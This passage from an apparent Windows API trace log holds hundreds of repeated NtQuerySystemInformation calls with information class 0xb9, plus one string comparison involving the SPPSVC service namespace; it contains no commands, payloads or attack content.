(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc900, Length=0x28, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x28, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0273.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9f0, Length=0x28, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc860, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7e0, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8d0, Length=0x20, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x38, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc950, Length=0x20, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x20, ResultLength=0x0) [0273.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcba0, Length=0x28, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x28, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x28, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0273.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd70, Length=0x38, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x20, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccf0, Length=0x50, ResultLength=0x0) [0273.188] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x28, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x28, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.193] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0273.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb40, Length=0x28, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x38, ResultLength=0x0) [0273.197] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x20, ResultLength=0x0) [0273.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccd8, Length=0x50, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.200] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.203] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaa0, Length=0x28, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.204] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x28, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x20, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x20, ResultLength=0x0) [0273.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, 